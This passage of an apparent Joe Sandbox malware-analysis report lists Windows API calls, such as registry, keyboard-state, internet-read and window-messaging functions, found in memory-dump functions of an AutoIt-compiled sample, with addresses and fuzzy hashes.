                                                  • String ID: GetSystemWow64DirectoryW$X64
                                                  • API String ID: 145871493-2590602151
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00594EDD,?,00661418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00594E9C
                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00594EAE
                                                  • FreeLibrary.KERNEL32(00000000,?,?,00594EDD,?,00661418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00594EC0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadProc
                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                  • API String ID: 145871493-3689287502
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?,005D3CDE,?,00661418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00594E62
                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00594E74
                                                  • FreeLibrary.KERNEL32(00000000,?,?,005D3CDE,?,00661418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00594E87
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadProc
                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                  • API String ID: 145871493-1355242751
                                                  APIs
                                                  • GetCurrentProcessId.KERNEL32 ref: 0061A427
                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0061A435
                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0061A468
                                                  • CloseHandle.KERNEL32(?), ref: 0061A63D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseCountersCurrentHandleOpen
                                                  • String ID:
                                                  • API String ID: 3488606520-0
                                                  APIs
                                                    • Part of subcall function 005FDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,005FCF22,?), ref: 005FDDFD
                                                    • Part of subcall function 005FDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,005FCF22,?), ref: 005FDE16
                                                    • Part of subcall function 005FE199: GetFileAttributesW.KERNEL32(?,005FCF95), ref: 005FE19A
                                                  • lstrcmpiW.KERNEL32(?,?), ref: 005FE473
                                                  • MoveFileW.KERNEL32(?,?), ref: 005FE4AC
                                                  • _wcslen.LIBCMT ref: 005FE5EB
                                                  • _wcslen.LIBCMT ref: 005FE603
                                                  • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 005FE650
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                  • String ID:
                                                  • API String ID: 3183298772-0
                                                  APIs
                                                    • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                                                    • Part of subcall function 0061C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0061B6AE,?,?), ref: 0061C9B5
                                                    • Part of subcall function 0061C998: _wcslen.LIBCMT ref: 0061C9F1
                                                    • Part of subcall function 0061C998: _wcslen.LIBCMT ref: 0061CA68
                                                    • Part of subcall function 0061C998: _wcslen.LIBCMT ref: 0061CA9E
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0061BAA5
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0061BB00
                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0061BB63
                                                  • RegCloseKey.ADVAPI32(?,?), ref: 0061BBA6
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0061BBB3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                  • String ID:
                                                  • API String ID: 826366716-0
                                                  • Opcode ID: b9eacdf2451a05dc63a5cd9d622a179a049ae3f4de4e96578e287f6abceef1b7
                                                  • Instruction ID: 5a5b2bb42ac8cf80f5439e7d8e9adc566b57454f5d5f92614037c750e230448d
                                                  • Opcode Fuzzy Hash: b9eacdf2451a05dc63a5cd9d622a179a049ae3f4de4e96578e287f6abceef1b7
                                                  • Instruction Fuzzy Hash: A761B631208241EFD714DF14C494EAABBE6FF84318F18955CF4994B2A2DB31ED45CB92
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 005F8BCD
                                                  • VariantClear.OLEAUT32 ref: 005F8C3E
                                                  • VariantClear.OLEAUT32 ref: 005F8C9D
                                                  • VariantClear.OLEAUT32(?), ref: 005F8D10
                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 005F8D3B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Variant$Clear$ChangeInitType
                                                  • String ID:
                                                  • API String ID: 4136290138-0
                                                  • Opcode ID: b26a372de3f0e562c45a580544565477ccf7d46ba17705abe72a8cc25226e931
                                                  • Instruction ID: 329c1407ba8d5442b296f911493e81a11d1881a546508a0ae47551a0bdf18bf1
                                                  • Opcode Fuzzy Hash: b26a372de3f0e562c45a580544565477ccf7d46ba17705abe72a8cc25226e931
                                                  • Instruction Fuzzy Hash: FB517BB5A00619EFCB10CF68C884AAABBF9FF89310B158559FA05DB354E734E911CF90
                                                  APIs
                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00608BAE
                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00608BDA
                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00608C32
                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00608C57
                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00608C5F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfile$SectionWrite$String
                                                  • String ID:
                                                  • API String ID: 2832842796-0
                                                  • Opcode ID: 0e2f01b9ad99131bd0bcbe0ae4078d78cafc1a373c969db3b4777411d02e3114
                                                  • Instruction ID: 777867c581f4ba736c7313645a5dd693a2e8a396496d8db744e8695373bbb92b
                                                  • Opcode Fuzzy Hash: 0e2f01b9ad99131bd0bcbe0ae4078d78cafc1a373c969db3b4777411d02e3114
                                                  • Instruction Fuzzy Hash: 0F513C35A00619DFDF15DF64C884AAEBBF5BF49314F088059E849AB3A2DB31ED51CB90
                                                  APIs
                                                  • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00618F40
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00618FD0
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00618FEC
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00619032
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00619052
                                                    • Part of subcall function 005AF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00601043,?,753CE610), ref: 005AF6E6
                                                    • Part of subcall function 005AF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,005EFA64,00000000,00000000,?,?,00601043,?,753CE610,?,005EFA64), ref: 005AF70D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                  • String ID:
                                                  • API String ID: 666041331-0
                                                  • Opcode ID: 522bc0e3b56259b78053636e243898d8a18dfcefd277864452aa0f7b4110c79e
                                                  • Instruction ID: 3227eb7bf93ce2069dd5ca52d89e59e8417c3a585b2761515ac94c25856e35b6
                                                  • Opcode Fuzzy Hash: 522bc0e3b56259b78053636e243898d8a18dfcefd277864452aa0f7b4110c79e
                                                  • Instruction Fuzzy Hash: 03512935604205DFDB15DF58C4988EDBBB2FF89364F098099E8069B362DB31ED86CB91
                                                  APIs
                                                  • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00626C33
                                                  • SetWindowLongW.USER32(?,000000EC,?), ref: 00626C4A
                                                  • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00626C73
                                                  • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0060AB79,00000000,00000000), ref: 00626C98
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00626CC7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Window$Long$MessageSendShow
                                                  • String ID:
                                                  • API String ID: 3688381893-0
                                                  • Opcode ID: 2b3f5d365b8acc6e7d7fdc1f14e3d5e7154798a35fb4b6019586081576201538
                                                  • Instruction ID: 8b092e2b85d9283e39c9b7ee07f8fe979cd9d6c35b79dbc5d9fdc0c2cc4ac2f2
                                                  • Opcode Fuzzy Hash: 2b3f5d365b8acc6e7d7fdc1f14e3d5e7154798a35fb4b6019586081576201538
                                                  • Instruction Fuzzy Hash: B241A035704924AFDB24AF28DC58FE97BA6EB09360F150268F895A73E0C371AD52CF50
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: f0f52b538e511925d7a5e43fe31554233d1ac3507564f1bb01359e45ff8cdd5c
                                                  • Instruction ID: 761fc567f157e6591b206f604744b52883c381fc7b85b3fa9c6d4a49bbfbc484
                                                  • Opcode Fuzzy Hash: f0f52b538e511925d7a5e43fe31554233d1ac3507564f1bb01359e45ff8cdd5c
                                                  • Instruction Fuzzy Hash: A7417D76A002049FCB24DFA8C885A5DBBA5FF89714F1545ADE615EB292DA31AE01CB80
                                                  APIs
                                                  • GetCursorPos.USER32(?), ref: 005A9141
                                                  • ScreenToClient.USER32(00000000,?), ref: 005A915E
                                                  • GetAsyncKeyState.USER32(00000001), ref: 005A9183
                                                  • GetAsyncKeyState.USER32(00000002), ref: 005A919D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: AsyncState$ClientCursorScreen
                                                  • String ID:
                                                  • API String ID: 4210589936-0
                                                  • Opcode ID: 394893c99e2ea3dfbdfffad96747f074295c63ad15e25a8daa9c5f91254f2243
                                                  • Instruction ID: c1a3b6c3d1db82c713cc060a7196f117c6c316c89c572a6cbf2ba00ad91ca0d6
                                                  • Opcode Fuzzy Hash: 394893c99e2ea3dfbdfffad96747f074295c63ad15e25a8daa9c5f91254f2243
                                                  • Instruction Fuzzy Hash: D1417F31A0865BBBDF199F64C848BEEBB75FF0A324F208219E465A72D0C7346950CF91
                                                  APIs
                                                  • GetInputState.USER32 ref: 006038CB
                                                  • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00603922
                                                  • TranslateMessage.USER32(?), ref: 0060394B
                                                  • DispatchMessageW.USER32(?), ref: 00603955
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00603966
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                  • String ID:
                                                  • API String ID: 2256411358-0
                                                  • Opcode ID: 93da56a074b947c05a4d944dc83931175d0fa429edfb078a66d6f31ee2e02fc7
                                                  • Instruction ID: 6dfc569d6ede0974bf803ca01b5773c7ea6f2d645cbe97af5aa9401bb950ac95
                                                  • Opcode Fuzzy Hash: 93da56a074b947c05a4d944dc83931175d0fa429edfb078a66d6f31ee2e02fc7
                                                  • Instruction Fuzzy Hash: 2E31E8709847519EEB39CB359808BF737AEAB02302F08056DD452963D0F3F49A85CB51
                                                  APIs
                                                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0060C21E,00000000), ref: 0060CF38
                                                  • InternetReadFile.WININET(?,00000000,?,?), ref: 0060CF6F
                                                  • GetLastError.KERNEL32(?,00000000,?,?,?,0060C21E,00000000), ref: 0060CFB4
                                                  • SetEvent.KERNEL32(?,?,00000000,?,?,?,0060C21E,00000000), ref: 0060CFC8
                                                  • SetEvent.KERNEL32(?,?,00000000,?,?,?,0060C21E,00000000), ref: 0060CFF2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                  • String ID:
                                                  • API String ID: 3191363074-0
                                                  • Opcode ID: 6deafa61f1960fbd1c4166cdbba35725bbb560cc50804c700b286d1e6cd2eda0
                                                  • Instruction ID: 05db2b5fbaa89a3f8d1d1758f9e4db109ad6d2a41b7c97c0b7da58a01a7fc224
                                                  • Opcode Fuzzy Hash: 6deafa61f1960fbd1c4166cdbba35725bbb560cc50804c700b286d1e6cd2eda0
                                                  • Instruction Fuzzy Hash: BD315E71540606EFDB28DFA5C8849AFBBFAEF54364B10452EF506D2281DB30AE42DB61
                                                  APIs
                                                  • GetWindowRect.USER32(?,?), ref: 005F1915
                                                  • PostMessageW.USER32(00000001,00000201,00000001), ref: 005F19C1
                                                  • Sleep.KERNEL32(00000000,?,?,?), ref: 005F19C9
                                                  • PostMessageW.USER32(00000001,00000202,00000000), ref: 005F19DA
                                                  • Sleep.KERNEL32(00000000,?,?,?,?), ref: 005F19E2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessagePostSleep$RectWindow
                                                  • String ID:
                                                  • API String ID: 3382505437-0
                                                  • Opcode ID: abcf7efd1f78701cb6063bdf8d4e8db8f4097649dffa4c4243531123797d5370
                                                  • Instruction ID: f01d71876cc23228f2eadc300d16a872238b09ce2b05b6eef089629b0965772c
                                                  • Opcode Fuzzy Hash: abcf7efd1f78701cb6063bdf8d4e8db8f4097649dffa4c4243531123797d5370
                                                  • Instruction Fuzzy Hash: E231D37190061DEFCB14CFA8CE59AEE3BB6FB44324F004229FA21A72D0C7B49954DB90
                                                  APIs
                                                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00625745
                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 0062579D
                                                  • _wcslen.LIBCMT ref: 006257AF
                                                  • _wcslen.LIBCMT ref: 006257BA
                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00625816
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$_wcslen
                                                  • String ID:
                                                  • API String ID: 763830540-0
                                                  • Opcode ID: 9c79b2149ef522a807c06da2c74a269d295c602af457d341c7bab8cd574ee0ac
                                                  • Instruction ID: 4989a3767625ba71620d45139e7548172db13ac85af81a9eb7ed877d79b3a52f
                                                  • Opcode Fuzzy Hash: 9c79b2149ef522a807c06da2c74a269d295c602af457d341c7bab8cd574ee0ac
                                                  • Instruction Fuzzy Hash: 97219971904A28DADB309F64EC45AEDBBBAFF44724F108216F92ADB280D770D985CF50
                                                  APIs
                                                  • IsWindow.USER32(00000000), ref: 00610951
                                                  • GetForegroundWindow.USER32 ref: 00610968
                                                  • GetDC.USER32(00000000), ref: 006109A4
                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 006109B0
                                                  • ReleaseDC.USER32(00000000,00000003), ref: 006109E8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Window$ForegroundPixelRelease
                                                  • String ID:
                                                  • API String ID: 4156661090-0
                                                  • Opcode ID: d4a75cf9a5359546fd2ea3160f97aa40ae7c262d5443111a6b38fc1ca370a43a
                                                  • Instruction ID: 03799fc358fbe5d8bf159086ac3a979e5b6199c674ace72a8a965648a0267877
                                                  • Opcode Fuzzy Hash: d4a75cf9a5359546fd2ea3160f97aa40ae7c262d5443111a6b38fc1ca370a43a
                                                  • Instruction Fuzzy Hash: B121A135600204AFEB14EF64D888AAFBBF6FF44710F04846CE84A97762DB70AC45CB90
                                                  APIs
                                                  • GetEnvironmentStringsW.KERNEL32 ref: 005CCDC6
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005CCDE9
                                                    • Part of subcall function 005C3820: RtlAllocateHeap.NTDLL(00000000,?,00661444,?,005AFDF5,?,?,0059A976,00000010,00661440,005913FC,?,005913C6,?,00591129), ref: 005C3852
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 005CCE0F
                                                  • _free.LIBCMT ref: 005CCE22
                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 005CCE31
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                  • String ID:
                                                  • API String ID: 336800556-0
                                                  • Opcode ID: a7e5688183c5b40d6478b1772ad5b81e36165cc57a488ce08721ea48dfd89a1f
                                                  • Instruction ID: 1dd9259f8ef0af844a8cbabd94c42c3f44f3226001d664a43093589a67b4368c
                                                  • Opcode Fuzzy Hash: a7e5688183c5b40d6478b1772ad5b81e36165cc57a488ce08721ea48dfd89a1f
                                                  • Instruction Fuzzy Hash: 46018472602A157F632256F66C8DE7F6D6DFEC7BA1315012DFD0AC7201EA618D0281F0
